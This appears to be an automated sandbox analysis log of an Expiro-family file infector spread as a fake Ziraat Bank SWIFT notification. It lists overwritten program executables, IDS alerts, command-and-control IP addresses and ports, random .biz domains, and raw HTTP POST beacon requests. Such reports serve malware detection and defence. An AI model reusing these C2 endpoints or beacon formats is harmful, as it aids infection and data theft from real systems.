Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zG.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\SysWOW64\perfhost.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msiexec.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\lynchtmlconv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\firefox.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\updater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\Uninstall.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\FXSSVC.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\SensorDataService.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXE	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe	Jump to behavior
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	System file written: C:\Windows\System32\alg.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\7-Zip\7zFM.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe	System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files\Mozilla Firefox\plugin-container.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe	Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0046445A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C6D1 FindFirstFileW,FindClose,	0_2_0046C6D1
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0046C75C
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046EF95
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0046F0F2
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046F3F3
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_004637EF
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00463B12
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0046BCBC

Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe	Jump to behavior
Source: C:\Windows\System32\alg.exe	File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:54634 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49724 -> 72.52.178.23:80
Source: Network traffic	Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:49755 -> 13.213.51.196:80
Source: Network traffic	Suricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:55274 -> 1.1.1.1:53

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 204.10.161.147
Source: Malware configuration extractor	URLs: 204.10.161.147:7082

Connects to many ports of the same IP (likely port scanning)

Source: global traffic

TCP traffic: 204.10.161.147 ports 7082,7081,0,2,7,8

Queries random domain names (often used to prevent blacklisting and sinkholes)

Source: unknown

DNS traffic detected: English language letter frequency does not match the domain names

Connects to many different domains

Source: unknown

Network traffic detected: DNS query count 49

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49723 -> 204.10.161.147:7082

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 13.248.148.254 13.248.148.254

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.11.240.239:80 -> 192.168.2.4:49717
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.11.240.239:80 -> 192.168.2.4:49717
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.245.175.187:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.245.175.187:80 -> 192.168.2.4:49760
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.43.119.120:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.43.119.120:80 -> 192.168.2.4:49767
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.169.144.97:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.169.144.97:80 -> 192.168.2.4:49751
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.26.80.133:80 -> 192.168.2.4:49787
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.26.80.133:80 -> 192.168.2.4:49787
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 34.229.166.50:80 -> 192.168.2.4:49776
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.229.166.50:80 -> 192.168.2.4:49776
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.85.87.184:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.85.87.184:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.229.117.57:80 -> 192.168.2.4:49722
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.229.117.57:80 -> 192.168.2.4:49722
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.212.150.54:80 -> 192.168.2.4:49795
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.212.150.54:80 -> 192.168.2.4:49795
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.142.91.111:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.142.91.111:80 -> 192.168.2.4:49752
Source: Network traffic	Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 13.213.51.196:80 -> 192.168.2.4:49779
Source: Network traffic	Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 13.213.51.196:80 -> 192.168.2.4:49779

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: POST /oqcvpoewhl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /bwejhhjeahxfje HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 836
Source: global traffic	HTTP traffic detected: POST /bspqodujb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /arkfkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /buysxojjpcbe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /uhxgrttve HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: GET /uhxgrttve?usid=25&utid=9755593280 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.przvgke.biz
Source: global traffic	HTTP traffic detected: POST /twetxppkkq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: knjghuig.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xltkhwus HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
Source: global traffic	HTTP traffic detected: POST /srydcadgxm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ldqqpocfqndx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ifsaia.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
